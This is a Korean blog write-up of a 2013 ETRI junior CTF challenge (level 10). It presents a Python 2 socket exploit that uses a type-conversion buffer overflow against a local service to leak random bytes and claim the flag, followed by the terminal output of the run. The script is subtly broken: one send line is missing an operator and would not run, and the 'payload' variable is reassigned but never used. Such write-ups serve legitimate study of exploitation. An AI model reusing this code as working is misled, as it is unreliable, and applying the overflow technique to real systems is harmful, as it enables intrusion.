상세 컨텐츠

본문 제목

2013 ETRI junior ctf level10 write up

0x10 정보보안/0x13 Write-Up

by sweetchip 2014. 2. 6. 12:44

본문

반응형



level10


binary


# jctf 2013 lv10 exploit -

from socket import *

import time


ip = "127.0.0.1"

port = 31333


payload = "257\n" # type conversion

payload = "134525080\n" # random[16]

payload = "7\n" # exit

payload = "A"*19 #buff ~ 19

payload = "\n" # buff ~ 20


s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))


print s.recv(1024)

s.send("257\n")


print s.recv(1024)

s.send("134525080\n")


print s.recv(1024)

s.send("7\n")


print s.recv(1024)

s.send("A"*19 "\n")


time.sleep(1)


canary = s.recv(1024)


print canary


canary = canary[164:]


print canary


s.send(canary)


print s.recv(1024)



위는 익스플로잇이다.




root@ubuntu:/home/sweetchip/Desktop/cyber/jctf# python ./a.py

Get me your information.

1. Age

2. Sex

3. Birth

4. Favorite number

5. Reversing skill

6. Exploitaion skill

7. Exit this menu

INPUT:

Value?

INPUT:

add_value(): added


Get me your information.

1. Age

2. Sex

3. Birth

4. Favorite number

5. Reversing skill

6. Exploitaion skill

7. Exit this menu

INPUT:

Thanks for the info.

1: number - 00000101, value - 0804b098

Are you trying to buffer overflow?!:

INPUT: [1] error: the buffer is too long. [36][AAAAAAAAAAAAAAAAAAA

ǖ>丒𢡊ඝ

Input the random bytes, if correct, you'll get the flag!

INPUT:

ǖ>丒𢡊ඝ

Input the random bytes, if correct, you'll get the flag!

INPUT:


Oh, wow! Congrats! The key is: this is flag zz << 임시로 만들어둔 플래그입니다.


INPUT:

root@ubuntu:/home/sweetchip/Desktop/cyber/jctf#


원래 로컬 문제지만 그냥 리모트로 돌리고 exploit을 진행했다.


또 이문제는 여러 풀이가 있을수 있지만 이번엔 type conversion buffer overflow 를 이용하여 random값을 유출시킨 뒤 풀었다.



반응형

관련글 더보기